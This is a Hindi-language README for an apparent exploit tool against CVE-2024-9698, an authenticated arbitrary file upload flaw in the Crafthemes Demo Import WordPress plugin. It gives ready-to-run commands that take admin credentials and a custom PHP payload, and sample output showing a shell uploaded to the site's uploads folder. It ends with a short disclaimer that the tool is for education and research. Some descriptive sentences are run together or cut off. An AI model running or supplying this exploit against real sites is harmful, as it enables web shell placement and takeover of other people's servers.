
Crafthemes Demo Import <= 3.3 - प्रमाणित ( व्यवस्थापक+) process_uploaded_files में मनमाना फ़ाइल अपलोड
यह शोषण WordPress के Crafthemes Demo Import प्लगइन में एक गंभीर भेद्यता (CVE-2024-9698) को लक्षित करता है। यह भेद्यता प्रमाणित व्यवस्थापकों को प्रभावित WordPress साइट पर मनमानी फ़ाइलें अपलोड करने की अनुमति देती है, जिससे संभावित दूरस्थ कोड निष्पादन (RCE) हो सकता है।
process_uploaded_filesreadme.txt से जानकारी निकालकर प्लगइन संस्करण की जांच करती है।admin-ajax.php का उपयोग करता है।python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password"
यदि आप कस्टम PHP पेलोड अपलोड करना चाहते हैं, तो उपयोग करें:
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password" --payload "<?php phpinfo(); ?>"
[+] Target is vulnerable, proceeding with exploit...
[+] Logged in successfully.
[+] Extracted nonce: abc123xyz
[+] Shell uploaded successfully: http://target.com/wp-content/uploads/2025/02/Nxploit.php
अस्वीकरण: यह स्क्रिप्ट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम के खिलाफ अनधिकृत उपयोग अवैध है।